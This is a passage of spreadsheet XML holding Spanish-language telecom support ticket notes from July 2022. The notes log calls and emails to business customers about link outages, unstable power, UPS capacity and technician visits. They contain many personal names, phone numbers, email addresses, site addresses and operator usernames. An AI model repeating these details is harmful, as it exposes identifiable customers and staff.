    <t>**SE LLAMA A CLIENTE DARWIN CHAMORRO 89313443 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001723851
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARWIN CHAMORRO 89313443 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001716973</t>
  </si>
  <si>
    <t>F4627611</t>
  </si>
  <si>
    <t>SE INTENTA CONTACTAR A CLIENTE DAVID DOMINGUEZ PARA VALIDAR SI ES POSIBLE RESCIBIR A LOS TECNICOS DESPUES DE LAS 6:00 PM, NO SE TIENE RESPUESTA DE CLIENTE
[17:32] JUAN CARLOS LOPEZ SANCHEZ
3001796704
COLA:
NOMBRE: A: 50431419097
NÚMERO: 50431419097
DURACIÓN: 0:00:33
ESTADO: CONECTADA
DETALLES: 50431419097
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 4/07/2022 17:31:55</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID DOMINGUEZ 31419097 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001793649 - 3001793782</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID DOMINGUEZ 31419097  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001796220</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DAVID DOMINGUEZ AL 31419097 CL INDICA QUE TUVO UNA CAIDA SOLICITA QUE SE LE LLAME NUEVAMENTE EN 1 HR **
-ID 3001729023
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SR DAVID DOMINGUEZ AL 31419097  PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001758458</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID DOMINGUEZ 31419097 MENCIONA QUE PERSONAL TECNICO YA SE IBA A RETIRAR PERO VOLVIERONA PRESENTAR CAIDA POR LO QUE INDICA QUE PERSONAL TECNICO SE ENCUENTRA EN PR REALIZANDO LAS VALIDACIONES
-ID 3001903085</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTEONDINA PEÑA AL 33688084 SOLICITA QUE SE LLAME AL SEÑOR DAVID AL RATO YA QUE ESTA EN UNA REUNION **
ID 3001785363
**</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE DAVID DOMINGUEZ AL 31419097 NO RESPONDE SE INTENTARA LUEGO**
-ID 3001785084 - 3001785257
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID DOMINGUEZ, SE LE COMENTA QUE TENEMOS A TENCICO A UNA HORA Y 45 MINUTOS DEL LUGAR, POR LO QUE CLIENTE MENCIONA QUE SE REPROGRAME VISITA PARA EL DIA DE MAÑANA A LAS 8:00 AM,
3001798382
COLA:
NOMBRE: A: 50431419097
NÚMERO: 50431419097
DURACIÓN: 0:02:49
ESTADO: CONECTADA
DETALLES: 50431419097
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 4/07/2022 17:45:08</t>
  </si>
  <si>
    <t>F4627612</t>
  </si>
  <si>
    <t>SE HABLA CON ERICKA MENDENDEZ 75817833 CLIENTE INDICA QUE NO GENERA LLAMADAS SOLO RECIBE, SE LE SOLICITA APOYO PARA UBICAR EQUIPOS PERO INDICA QUE EN CASOS ANTERIORES SE LE HA COORDINADO VISITA YA QUE NO CONOCE DONDE ESTÁN SUS EQUIPOS Y SU PBX. INDICA QUE ATIENDE HASTA LAS 5 PM.
SE OBSERVA QUE EN CASOS ANTERIORES HA TENIDO ESTA MISMA FALLA RESULTANDO EN FALLAS EN LA PBX.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050375817833
NÚMERO: 0050375817833
INICIO: HOY, 11:25 A. M.
FIN: HOY, 11:31 A. M.
DURACIÓN: 6:03
ID DE LLAMADA: 3001715110</t>
  </si>
  <si>
    <t>F4627626</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE STANLEY BLANCO AL 61256204 NO RESPONDE ENVIA A BUZON DE VOZ || SE INTENTARA LUEGO **
-ID 3001725837
**</t>
  </si>
  <si>
    <t>F4627637</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUSTAVO ZAMORA AL 2335-1084 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001738437
**</t>
  </si>
  <si>
    <t>F4627641</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUSTAVO ZAMORA AL 23351084 CONTESTA LA SEÑORITA VICTORIA QUIEN INDICA QUE N0 CUENTAN CON INTERNET  SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001720231
**</t>
  </si>
  <si>
    <t>F4627646</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE PONCE MUÑOZ 70744758  MENCIONA QUE LOS EQUIPOS SE ENCONTRABAN EN UNA REPISA Y SE CALLERON POR LO QUE SOLICITA VISITA TECNICA
-ID 3001740911
NOMBRE DEL CLIENTE: POLICIA NACIONAL CIVIL
UBICACIÓN:FRENTE AL COLEGIO LICEO SALVADOREÑO FLOR BLANCA, SAN SALVADOR
CONTACTO EN SITIO: JOSE PONCE MUÑOZ - 70744758
HORARIO DE ATENCION:24/7
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4627670</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GUADALUPE HENRIQUEZ QUIEN INDICA QUE ESTA EN HORARIO DE ALMUERZO Y REGRESAN A LAS 14 HORAS.
3001725562
COLA:
NOMBRE: A: 0050378037858
NÚMERO: 0050378037858
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 0050378037858
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 4/07/2022 12:05:56</t>
  </si>
  <si>
    <t>F4627672</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JEFFERSON ARCE AL 2243-7253 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE DEJE EN OBSERVACION 24 HRS Y QUE SE LLAME NUEVAMENTE**
-ID 3001748894
**</t>
  </si>
  <si>
    <t>F4627680</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE XINIA AYALA 22109500 MENCIONA QUE YA ESTAN GESTIONANDO POR CORREO CON PERSONAL DE ATM
-ID  3001791644</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE XINIA AYALA AL 22109500 INDICA QUE AHORITA ESTARA RESPONDIENDO EN LA COLA DE CORREOS **
-ID 3001750711
**</t>
  </si>
  <si>
    <t>F4627738</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KARINA RAMIREZ AL 77772531 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001753277 - 32048480
**</t>
  </si>
  <si>
    <t>F4627749</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MAURICIO RIVAS 76001358 MENCIONA QUE NECESITA EL CAMBIO DE LA CONTRASEÑA (NO BRINDA MAYOR INFORMACION) SE LE SOLICITA APOYO A GESTOR PERO CLIENTE CORTA LA LLAMADA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001753701</t>
  </si>
  <si>
    <t>F4627754</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TIENDA 42113454 CONTESTA EL SEÑOR  RENE QUIEN INDICA QUE ESTA REALIZANDO PRUEBAS YA QUE HUBO UN APAGON Y SOLICITA QUE SE LE LLAME EN 30MIN **
-ID 3001742636
**</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JOSUÉ HERRERA/CLIENTE; SE LE INDICA QUE SE ASIGNARÁ TÉCNICO A TIENDA; PR INDICÓ QUE TUVIERON PROBLEMAS DE ENERGÍA EN SECTOR.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 42113454 MENCIONA QUE PRESENTARON PROBLEMAS DE ENERGIA PERO YA RETORNO Y APLICARON REINICIO PERO EL INCONVENIENTE PERSISTE, CLIENTE SOLICITA VISITA TECNICA
-ID 3001754946
NOMBRE DEL CLIENTE: GMG COMERCIAL GUATEMALA S.A.
UBICACIÓN:1 AVENIDA 2 CALLE ZONA 2 C.C. SOTO CHIQUIMULILLA
CONTACTO EN SITIO: ENCARGADO DE TURNO
HORARIO DE ATENCION:9:00 - 19:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4627797</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO CUELLAR 22951999 EXTENSION 111 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001759200</t>
  </si>
  <si>
    <t>F4627825</t>
  </si>
  <si>
    <t>SE ENVIA CORRREO A CLIENTE -- CLIENTE DEBE DE REVISAR A NIVEL INTERNO, NO SE TIENE EQUIPOS LAN CONECTADOS.
RE: CAÍDA DE ENLACE DE DATOS COOPERATIVA "EL NEGRITO" E</t>
  </si>
  <si>
    <t>F4627829</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL  PDV TEL 22696809  - 51261232 EN EL PRIMER NUMERO NO RESPONDEN Y EN EL SEGUNDO NUMERO INDICAN QUE ES NUMERO EQUIVOCADO **
-ID 3006789901 - 3001790075
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22696809  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001795914</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  22696809 - 51261232 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001771521 - 3001771706</t>
  </si>
  <si>
    <t>F4627832</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO GONZALEZ /87569171, COMENTA QUE SE PUEDA CERRAR INCIENTE, ESTARA VALIDANDO EL TEMA DE UPS EN SITIO , Y DE NO LEVANTAR EL SERVICIO ESTARA REPORTANDO NUEVAMENTE,
3001786722
COLA:
NOMBRE: A: 50587569171
NÚMERO: 50587569171
DURACIÓN: 0:01:41
ESTADO: CONECTADA
DETALLES: 50587569171
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 4/07/2022 16:33:10</t>
  </si>
  <si>
    <t>F4627844</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR RIOS 58064113 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001761917</t>
  </si>
  <si>
    <t>F4627847</t>
  </si>
  <si>
    <t>BUENAS TARDES TENDRÁN INFORMACIÓN DE LA SIGUIENTE SUCURSAL CC_AZTECA_GT_SUC_003465/265900366T?
SERGIO, 14:35
BUENAS TARDES SE TIENE FALLA ELÉCTRICA EN EL SECTOR</t>
  </si>
  <si>
    <t>F4627862</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE CLAUDIA ROSALES INDICA QUE UNA EXTENSION NO LE ESTA FUNCIONANDO.
3001758789
COLA:
NOMBRE: A: 0050377006396
NÚMERO: 0050377006396
DURACIÓN: 0:00:20
ESTADO: MARCANDO
DETALLES: 0050377006396
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 4/07/2022 14:40:31</t>
  </si>
  <si>
    <t>F4627869</t>
  </si>
  <si>
    <t>SE HABLA CON 58072694 BYRON VASQUEZ INFORMA QUE AUN NO TIENEN ALGUNA SOLICITUD INTERNA PARA REVISION O AUMENTO DE CAPACIDAD DE UPS, PERO INDICA QUE ESTARA CREANDO UNA GESTION PARA VER SI SE PUEDE AUMENTAR LA CAPACIDAD DEL UPS YA QUE NO SOPORTA LA CARGA POR LA CANTIDAD DE EQUIPOS Y TAMBIEN LA ENERGIA ES MUY INESTABLE EN EL LUGAR.
ID
3001991646
COLA:
NOMBRE: A: 58072694
NÚMERO: 58072694
DURACIÓN: 0:02:58
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58072694
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 5/07/2022 16:59:06</t>
  </si>
  <si>
    <t>SE LLAMA A 32852934 - CLAUDIA ATIENDE CLAUDIA, INDICA QUE EN LOS EQUIPOS DE CLARO OBSERVA QUE ESTAN CONECTADOS A ALGO QUE PARECE SER UPS PERO DESCONOCE SI ESTA EN BUEN ESTADO, INDICA QUE CUANDO HAY BAJONES DE ENERGIA SE QUEDAN SIN SISTEMA, POR LO QUE ES PROBABLE QUE NO ESTE EN BUEN ESTADO, SE ACUERDA LLAMAR A 30478956 -MIGUEL SALGUERO PARA VALIDAR SI ES UPS Y SI ESTA EN BUEN ESTADO YA QUE INDICA QUE HAY BAJONES DE ENERGIA CONSTANTEMENTE EN EL SECTOR. SE LLAMARA EN BREVE YA QUE INDICA QUE NO SE ENCUENTRA EN AGENCIA EN ESTE MOMENTO, Y EL ES EL ENCARGADO DE LA AGENCIA YA QUE NO ESTA EL GERENTE.
ID
3001962321
COLA:
NOMBRE: A: 32852934
NÚMERO: 011 50232852934
DURACIÓN: 0:04:12
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50232852934
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 5/07/2022 15:18:56</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO DE AGENCIA  7947-3750 , PERSONAL INDICA QUE GERENTE NO SE ENCUENTRA EN ESTE MOMENTO PERO BRINDA NUMERO DE LA PERSONA QUE SE ENCUENTRA CERCA DE LOS EQUIPOS || 32852934 - CLAUDIA
ID
3001961124
COLA:
NOMBRE: A: 79473750
NÚMERO: 79473750
DURACIÓN: 0:01:30
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 79473750
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 5/07/2022 15:12:31</t>
  </si>
  <si>
    <t>SE HABLA CON 30478956 -MIGUEL SALGUERO QUIEN EN ESTE MOMENTO ESTA A CARGO DE LA AGENCIA, INFORMA QUE EL UPS QUE TIENEN ESTA NUEVO PERO QUE NO SOPORTA LA CARGA POR LA CANTIDAD DE EQUIPOS CONECTADOS YA QUE LA ENERGIA ES INESTABLE EN EL LUGAR PERO TAMBIEN AHORA TIENEN VARIOS EQUIPOS CONECTADOS, INCLUYENDO LA VENTILACION Y AIRE ACONDICIONADO, LO CUAL PROVOCA QUE NO SOPORTE LA BATERIA, BRINDA NUMERO DE GERENTE  58072694 BYRON VASQUEZ PARA VALIDAR SI YA SE TIENE ALGUNA GESTION INTERNA PARA REPARACION O AUMENTAR LA CAPACIDAD DEL UPS
ID
3001989589
COLA:
NOMBRE: A: 30478956
NÚMERO: 011 50230478956
DURACIÓN: 0:03:42
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: +50230478956
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 5/07/2022 16:50:59</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A EJECUTIVO ANA HERRARTE Y DARLING ALVAREZ
KENNY ROBERT RIVERA JUAREZ
ESTIMADOS:
LES SALUDO CORDIALMENTE, ASÍ MISMO EL MOTIVO DE LA PRESENTE ES PARA COMENTARLES QUE POR PARTE DEL MONITOREO PROACTIVO SE HAN OBSERVADO REINICIOS CONSTANTES EN LOS EQUIPOS DEL SERVICIO PARA LA AGENCIA CC_FUNDGENESIS_GT_LOS_AMATES_036. PERSONAL EN PUNTO REMOTO MIGUEL SALGUERO 30478956 Y BYRON VÁSQUEZ 58072694 NOS INFORMA QUE EL UPS NO SOPORTA LA CARGA CADA VEZ QUE HAY ALGUNA FLUCTUACIÓN ELÉCTRICA, POR TAL MOTIVO ES QUE SE REINICIAN LOS EQUIPOS Y LA ENERGÍA ELÉCTRICA ES MUY INESTABLE EN EL LUGAR.
TICKET:  F4627869
ID:  245700086T
IDENTIFICADOR DEL CLIENTE:  CC_FUNDGENESIS_GT_LOS_AMATES_036
UBICADO EN:  KM. 200.5 RUTA AL ATLANTICO, A LA PAR DE AGENCIA LA ESTRELLA, FRENTE AL CENTRO COMERCIAL LOS AMATES
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE (CENTRAL) POR TEMA DE UPS QUE NO SOPORTA LA CARGA Y ENERGIA MUY INESTABLE EN EL SECTOR
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
REFERENTE AL ENLACE DE LA AGENCIA CC_FUNDGENESIS_GT_LOS_AMATES_036, SOLICITAMOS SU APOYO CON LA REVISIÓN DE UPS YA QUE OBSERVAMOS EN NUESTRO MONITOREO REINICIOS CONSTANTES SOBRE EL EQUIPO INSTALADO EN LA AGENCIA DE LOS AMATES 036, PERSONAL EN PUNTO REMOTO MIGUEL SALGUERO 30478956 Y BYRON VÁSQUEZ 58072694 NOS INFORMA QUE EL UPS NO SOPORTA LA CARGA Y CUANDO HAY APAGONES DE ENERGÍA SE REINICIA EL EQUIPO Y SE QUEDAN MOMENTÁNEAMENTE SIN SISTEMA POR LO CUAL AGRADECEMOS SU APOYO CON LA REVISIÓN PARA QUE LOS EQUIPOS ESTÉN PROTEGIDOS Y PUEDAN FUNCIONAR DE MANERA ADECUADO Y EVITAR ALGÚN DAÑO FUTURO A CAUSA DE LAS FLUCTUACIONES ELÉCTRICAS EN EL SECTOR.
TICKET:  F4627869
ID:  245700086T
IDENTIFICADOR DEL CLIENTE:  CC_FUNDGENESIS_GT_LOS_AMATES_036
UBICADO EN:  KM. 200.5 RUTA AL ATLANTICO, A LA PAR DE AGENCIA LA ESTRELLA, FRENTE AL CENTRO COMERCIAL LOS AMATES
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4627871</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIA RUANO AL 59871825  CONFIRMA SERVICIO ESTABLE Y SE LE NOTIFICA QUE EL ENLOACE DEL PROVEEDOR SE OBSERVA QUE ESTA CAIDO**
 -ID 3001787485
**</t>
  </si>
  <si>
    <t>F4627880</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 78412751 MENCIONA QUE PERSISTE EL INCONVENIENTE DE NO PODER SACAR NI RECIBIR LLAMADAS, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001766807</t>
  </si>
  <si>
    <t>F4627887</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7887
ID: 349900173T
IDENTIFICADOR DEL CLIENTE: CC_IJSUD_GT_MAZATENANGO_ORIENTE
UBICADO EN: INTERNET.- 2 CALLE 4-00 LOTIFICACION RAMIREZ ZONA 3 MAZATENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4627897</t>
  </si>
  <si>
    <t>DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 4 DE JULIO DE 2022 15:18PARA: ROSALESFJ@CHURCHOFJESUSCHRIST.ORG &lt;ROSALESFJ@CHURCHOFJESUSCHRIST.ORG&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARARMADO PARA CLIENTE "CC_IJSUD_GT_FRAY_BARTOLOME_DE_LAS_CAS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7897
ID: 349900404T
IDENTIFICADOR DEL CLIENTE:  CC_IJSUD_GT_FRAY_BARTOLOME_DE_LAS_CASAS
UBICADO EN:  INTERNET_FRAY BARTOLOME DE LAS CASAS ZONA 0 BARRIO HOSP I. ALTA VERAPAZ LATITUD:15.802272 LONGITUD -
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4627905</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRITA. DELMA 89783972 MENCIONA QUE EL SERVICIO ESTA PRESENTANDO INTERMITENCIA E INESTABILIDAD
CLIENTE MENCIONA QUE EL TEMA DE LA ENERGIA TODO ESTA BIEN
CLIENTE MENCIONA QUE SE CONECTAN POR MEDIO DE WIFI Y POR CABLE Y A TODOS LES DA EL MISMO PROBLEMA
-ID 3001769496</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SRITA. DELMA 89783972 PARA SOLICITAR DATOS DE VISITA
-ID 3001772049
NOMBRE DEL CLIENTE: GRUPO AZUL
UBICACIÓN:COLONIA CASTAÑO SUR ESQUINA OPUESTA DE BANCO POPULAR CASA C9, A LA ALURA DEL BOULEVARD MORAZAN TEGUCIGALPA
CONTACTO EN SITIO: SRITA. DELMA 89783972
HORARIO DE ATENCION:24/7
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4627916</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PRUDENCIO UBICADO EN TICKETS ANTERIORES PERO SE ESCUCHA SIN TONO LA LLAMADA.
3001771605
COLA:
NOMBRE: A: 41511219
NÚMERO: 41511219
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:SUSCRIPTOR AUSENTE (CÓDIGO DE CAUSA ISDN 20)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 41511219
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 4/07/2022 15:42:02</t>
  </si>
  <si>
    <t>F4627921</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DEL TEC. RONALD QUIEN INDICA QUE EL SERVICIO ESTABA DESCONFIGURADO EN LA REPISA LRS.
SE VALIDA EL SERVICIO CON EL CLIENTE NELSON PEREZ.
3001794230
COLA: CNOC_ACCESO_EMPRESARIAL
NOMBRE: DE: 0050322503355
NÚMERO: 0050322503355
DURACIÓN: 0:01:50
ESTADO: CONECTADA
DETALLES: 0050322503355
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 4/07/2022 17:16:43</t>
  </si>
  <si>
    <t>SE RECIBE CORREO POR PARTE DEL CLIENTE.
BUENAS TARDES
ENTERADO ESTARÉ PENDIENTE
GRACIAS</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE NELSON PEREZ QUIEN ESTA UBICANDO EL EQUIPO.
3001771542
COLA:
NOMBRE: A: 0050379473192
NÚMERO: 0050379473192
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 0050379473192
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 4/07/2022 15:41:56</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE.
BUENAS TARDES,
POR ESTE MEDIO SOLICITO DE SU APOYO CON EL INGRESO A LOS TECNICOS PARA REVISION DEL E1 TELEFONICO.
GDN 25230900.
PARA LOS SIGUIENTES POSIBLES TECNICOS.</t>
  </si>
  <si>
    <t>F4627928</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. GREGORIO AL 94424449 INDICA QUE HA ESTADO INESTABLE Y SOLICITA QUE SE DEJE EN OBSERVACION HASTA MAÑANA A LAS 10:00 AM **
-ID 3001783769
**</t>
  </si>
  <si>
    <t>F4627931</t>
  </si>
  <si>
    <t>SE TIENE CONOCIMIENTO POR HORARIO INDICADO EL DIA DE HOY QUE CL SE RETIRA A LAS 17:00 HORAS, SE LLAMARA A PARTIR DE LAS 8:00 HORAS PARA SEGUIMIENTO, A NIVEL DE CLARO SERVICIO OK PERO SE VALIDA QUE SE TIENE CAIDA A NIVEL LAN.-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERLIN PEREZ 81204782 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001784174</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERLIN PEREZ 81204782 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 15 HRS
-ID 3001798562</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERLIN PEREZ AL 81204782 INDICA QUE NO SE ENCUENTRA EN LA OFICINA SOLICITA QUE SE LE LLAME DE 13:00 HRS EN ADELANTE**
-ID 1001045414
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ERLIN PEREZ 81204782 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001969680</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERLIN PEREZ AL 81204782 E INDICA QUE A LAS 13:00 HRS ESTARA APOYANDO A REALIZAR PRUEBAS || SE NOTIFICA A GESTOR **
-ID 1001046683
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERLIN PEREZ 81204782 SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001980882</t>
  </si>
  <si>
    <t>F4627936</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR.JORGE REYES 99706017 PERO NO RESPONDE
-ID 3001795389</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR.JORGE REYES 99706017 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001788941</t>
  </si>
  <si>
    <t>F4627937</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA CARRANZA 78116541 MENCIONA QUE EL INCONVENIENTE ES QUE AUN NO HAN REALIZADO EL PAGO DE LA FACTURA CORRESPONDIENTE AL SERVICIO
-ID 3001782041</t>
  </si>
  <si>
    <t>F4627945</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO FERNANDEZ AL 22437253 CONTESTA EL SEÑOR JEFERSON ARCE QUIEN INDICA QUE HA HA ESTADO CON PERDIDAS LA ULTIMA FUE HOY A LAS 6:40 AM PERDIDA DEL 50%  | SE NOTIFICA A GESTOR **
-ID 3001823994
**</t>
  </si>
  <si>
    <t>F4627950</t>
  </si>
  <si>
    <t>SE COLA DE CORREOS, SE OBSERVA RESPUESTA POR PARTE DE CLIENTE CONFIRMANDO VISITA PARA EL DÍA DE HOY A LAS  8:00 AM
DE: NESTOR DANIEL CARRANZA AGUILA &lt;NESTOR.CARRANZA@HIPOTECARIO.COM.SV&gt;
ENVIADO: LUNES, 4 DE JULIO DE 2022 21:03
PARA: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; GCI &lt;CLIENTE.INTERNO@HIPOTECARIO.COM.SV&gt;
CC: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: F4627950 || IP2145198//BANCO HIPOTECARIO DE EL SALVADOR//ENLACE CAIDO//SM
GRACIAS, CONFIRMO QUE EL PERMISO DE INGRESO DEL PERSONAL TÉCNICO SE ENCUENTRA YA GESTIONADO.
EL HORARIO DE ATENCIÓN ES DE 08:00 A.M. ¿ 04:00 P.M.</t>
  </si>
  <si>
    <t>F4627955</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 89342096 MENCIONA QUE NO SE PUEDEN CONECTAR A LAS SIGUIENTES IP
172.29.0.1
172.28.0.1
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001797759</t>
  </si>
  <si>
    <t>F4627960</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE STANLEY BLANCO 61256204 MENCIONA QUE REALIZO PRUEBAS, PERO INCONVENIENTE PERSISTIA CLIENTE SOLICITA SE PUEDA COMPARTIR LOS DATOS, SE LE BRINDAN LOS DATOS
PUERTA DE ENLACE
MASCARA
RANGO DE IP
-ID 3001985827</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE STANLEY BLANCO AL 61256204  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001897108
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE STANLEY BLANCO AL 61256204  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001909613
**</t>
  </si>
  <si>
    <t>F4627966</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS 32387925 QUIEN APLICA REINICIOS A LOS EQUIPOS DE CLARO PERO EL INCONVENIENTE PERSISTE, SE SOLICITARON DATOS DE VISITA
-ID 3001789363
NOMBRE DEL CLIENTE: MOTO REPUESTOS
UBICACIÓN:BO. EL BANCO, MEDIA CUADRA DE RESTAURANTE LA PEÑA DE HOREB, CHOLOMA CORTEZ
CONTACTO EN SITIO: CARLOS 32387925
HORARIO DE ATENCION:7:30 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4627984</t>
  </si>
